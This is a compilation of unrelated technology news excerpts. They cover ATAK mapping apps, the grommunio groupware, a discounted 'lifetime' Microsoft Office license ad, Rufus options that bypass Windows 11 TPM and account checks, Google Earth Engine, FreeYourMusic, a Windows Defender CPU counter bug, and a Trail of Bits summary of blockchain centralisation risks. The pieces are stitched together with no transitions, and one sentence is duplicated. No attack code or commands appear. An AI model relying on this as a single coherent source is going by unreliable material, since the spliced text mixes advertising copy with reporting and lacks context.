At the time of writing, ATAK is significantly more mature than iTAK and WinTAK, so it’s the best option if you want to start exploring. iTAK is actually a bit easier to start using immediately, but it’s missing a lot of features and can’t load plugins.
Opening ATAK on Android for the first time will quickly become apparent that it is not exactly intuitive to use. I won’t bore you with a complete tutorial but will share a couple of tips I’ve found helpful. Firstly, RTFM. The usage of many of the features and tools is not self-evident, so the included PDF manual (Settings > Support > ATAK Documents) might come in handy. There is also a long list of settings to customize, which are a lot easier to navigate with the search function in the top bar of the Settings menu.
No maps are included in ATAK by default, so download and import [Joshua Fuller]’s ATAK-Maps package. This gives ATAK an extensive list of map sources to work with, including Google Maps and OpenStreetMaps. ATAK can also cache maps and imagery for offline use. ATAK only has low-resolution elevation data included by default, but you can download and import more detailed elevation data from the USGS website.
grommunio efficiently summarizes all requirements of modern, digital communication and collaboration. This includes the device and operating system independent management of sensitive data such as e-mail, contacts, calendar, chat, video conference, file sharing and much more – in real time.
With open source technology based on Linux, grommunio is scalable and meets the highest security requirements. Thanks to its advanced architecture, grommunio can be integrated into existing systems without great effort. Thanks to its advanced architecture, grommunio can be integrated into existing systems without great effort.
[…]
As the first open source solution – with a fully functional implementation of Outlook Anywhere (RPC-over-HTTP) and MAPI-over-HTTP, grommunio is the alternative to proprietary backends for native interoperability with Microsoft Outlook.
Despite the increasing number of more economical options (read also: free) on the market, many people still prefer Microsoft Office over the alternatives available. With millions of users worldwide, the office suite packs programs with powerful functions that enable students, business owners, and professionals to reach peak productivity. From document formatting to presentation building to number crunching, there’s nearly nothing it can’t do in terms of executing digital tasks.
The only setback? A license can be expensive, especially if you’re the one shouldering the fees instead of your company. If you wish to have access to the suite for personal use, you either have to pay recurring fees for a subscription or cough up hundreds in one go for an annual license. If none of these options appeal to you, maybe this Microsoft Office Home and Business: Lifetime License deal can. For our Deals Day sale, you can grab it on sale for only $39.99 — no coupon needed.
This bundle is designed for families, students, and small businesses who want unlimited access to MS Office apps and email without breaking the bank. The license package includes programs you already likely use on the regular, including Word, Excel, PowerPoint, Outlook, Teams, and OneNote. And with a one-time purchase, you can install it on one Mac computer for lifetime Microsoft Office use at home or work.
Upon purchase, you get access to your software license keys and download links instantly. You also get free updates for life across all programs, along with free customer service that offers the best support in case any of the apps run into trouble. The best part? You only have to pay once and you’re set for life.
The Microsoft Office Home and Business: Lifetime License normally goes for $349, but from today until July 14, you can get it for only $39.99 thanks to the special Deals Day event. Click here for Mac and here for Windows.
[…]The latest beta version of Rufus, which in future will be version 3.19, has some interesting new additions. While it writes your ISO, you can optionally disable some of Windows’ more annoying features.
It has the ability to turn off TPM chip detection and the requirement for Secure Boot, which should enable you to install Windows 11 on older machines if you so wish. It lets you bypass the need for a Microsoft account – although you will need to disconnect the target PC from a network for this to work. It also allows you to automatically respond “no” to all Microsoft’s data-collection questions during setup.
All these sound welcome changes to us. The Microsoft account requirement recently popped up a new irritation on our test install: it automatically keeps the Desktop folder on OneDrive, which we found very annoying when we wanted to briefly keep a large file there.
This means that Rufus rockets up the chart of The Reg FOSS desk’s favorite tools for decluttering Windows, and it might even surpass the very handy Ventoy for USB installs.
Already on the list were two O&O tools: AppBuster and ShutUp10++. AppBuster makes it easy to uninstall most of the MetroModern apps that Microsoft in its finite wisdom bundles with Windows.
[…]
If you like things clean and minimal, you might want to disable Windows 11’s “widgets” and “chat” buttons. At least no external tools are needed for that.
For the past decade, researchers in academia and the nonprofit world have had access to increasingly sophisticated information about the Earth’s surface, via the Google Earth Engine. Now, any commercial or government entity will have access to Google Cloud’s new enterprise-grade, commercial version of the computer program.
Google originally launched Earth Engine for scientists and NGOs in 2010. One of the world’s largest publicly available Earth observation catalogs, it combines data from satellites and other sources continuously streaming into Earth Engine. The data is combined with massive geospatial cloud-computing resources, which lets organizations use the raw data for timely, accurate, high-resolution insights about the state of the world. That means they can keep a near-constant eye on the world’s forests, water sources, ecosystems and agriculture — and how they’re all changing.
Google Cloud says it’s commercializing Earth Engine now to cater to business customers that are prioritizing sustainability. Businesses are under pressure — from regulators, investors and customers — to reduce their carbon emissions. So, Google is rolling out new products that promise to help them meet their sustainability goals with more and better data.
[…]
Google says Earth Engine will still be available at no cost for nonprofits, academic research and educational use cases.
FreeYourMusic is a paid app available for Android, iOS, Windows, Mac, and Linux that will transfer your data between Apple Music, Spotify, YouTube Music, Deezer, Pandora, Tidal, Soundcloud, and at least a dozen other streaming apps. It also lets you back up and store some of your data locally on your device.
FreeYourMusic’s backup and transfer tools cost $15, but that’s a one-time purchase that grants you lifetime access on all supported devices and streaming apps.
A bug, discovered by TechPowerUp associate software author Kevin Glynn, causes Windows Defender to “randomly start using all seven hardware performance counters provided by Intel Core processors.” A utility Glynn created that monitors and logs performance counters on Intel Core CPUs since 2008 found that the strange behavior results in significantly reduced performance.
Bogged down by Defender hogging CPU time, a Core i9-10850K running at 5GHz loses 1,000 Cinebench points, which is about a 6% drop from the norm. Owners with Intel Core 8th, 9th, 10th, and 11th Gen processors, on both desktops and laptops, have noted similar performance hits.
[…]
As TechPowerUp notes, the underlying problem is that Windows Defender will randomly start using all seven hardware performance counters, including three fixed-function ones. Each counter can be programmed to a different privilege mode and is shared among multiple programs. For whatever reason, Defender is randomly changing the privilege level of the counters, creating a conflict with the programs trying to use them at a different level. It can happen at boot and sporadically thereafter.
To be clear, this is not an issue with Intel processors, because manually overriding the counters and resetting them returns a system to normal performance. There is no way to prevent Windows Defender from harassing your Intel processor unless you download third-party software.
[…]
Another way of overcoming this bug is by downloading software created by Glynn called Counter Control, which identifies when Defender starts using all seven performance counters and “resets” them to their appropriate state.
A more permanent solution is to download TechPowerUp’s ThrottleStop v9.5 software and enable a feature called “Windows Defender Boost” in “Options.” This setting activates a programmable timer that Defender sees and reacts to by ceasing to use all the counters.
[…]Over the past year, Trail of Bits was engaged by the Defense Advanced Research Projects Agency (DARPA) to examine the fundamental properties of blockchains and the cybersecurity risks associated with them. DARPA wanted to understand those security assumptions and determine to what degree blockchains are actually decentralized.
[…]
The report also contains links to the substantial supporting and analytical materials. Our findings are reproducible, and our research is open-source and freely distributable. So you can dig in for yourself.
Key findings
Blockchain immutability can be broken not by exploiting cryptographic vulnerabilities, but instead by subverting the properties of a blockchain’s implementations, networking, and consensus protocols. We show that a subset of participants can garner undue, centralized control over the entire system:
While the encryption used within cryptocurrencies is for all intents and purposes secure, it does not guarantee security, as touted by proponents.
Bitcoin traffic is unencrypted; any third party on the network route between nodes (e.g., internet service providers, Wi-Fi access point operators, or governments) can observe and choose to drop any messages they wish.
Tor is now the largest network provider in Bitcoin; just about 55% of Bitcoin nodes were addressable only via Tor (as of March 2022). A malicious Tor exit node can modify or drop traffic.
More than one in five Bitcoin nodes are running an old version of the Bitcoin core client that is known to be vulnerable.
The number of entities sufficient to disrupt a blockchain is relatively low: four for Bitcoin, two for Ethereum, and less than a dozen for most proof-of-stake networks.
When nodes have an out-of-date or incorrect view of the network, this lowers the percentage of the hashrate necessary to execute a standard 51% attack. During the first half of 2021, the actual cost of a 51% attack on Bitcoin was closer to 49% of the hashrate—and this can be lowered substantially through network delays.
For a blockchain to be optimally distributed, there must be a so-called Sybil cost. There is currently no known way to implement Sybil costs in a permissionless blockchain like Bitcoin or Ethereum without employing a centralized trusted third party (TTP). Until a mechanism for enforcing Sybil costs without a TTP is discovered, it will be almost impossible for permissionless blockchains to achieve satisfactory decentralization.
Novel research within the report
Analysis of the Bitcoin consensus network and network topology
Updated analysis of the effect of software delays on the hashrate required to exploit blockchains (we did not devise the theory, but we applied it to the latest data)
Calculation of the Nakamoto coefficient for proof-of-stake blockchains (once again, the theory was already known, but we applied it to the latest data)
Analysis of software centrality
Analysis of Ethereum smart contract similarity
Analysis of mining pool protocols, software, and authentication
Combining the survey of sources (both academic and anecdotal) that support our thesis that there is a lack of decentralization in blockchains
The research to which this blog post refers was conducted by Trail of Bits based upon work supported by DARPA under Contract No. HR001120C0084 (Distribution Statement A, Approved for Public Release: Distribution Unlimited). Any opinions, findings and conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of the United States Government or DARPA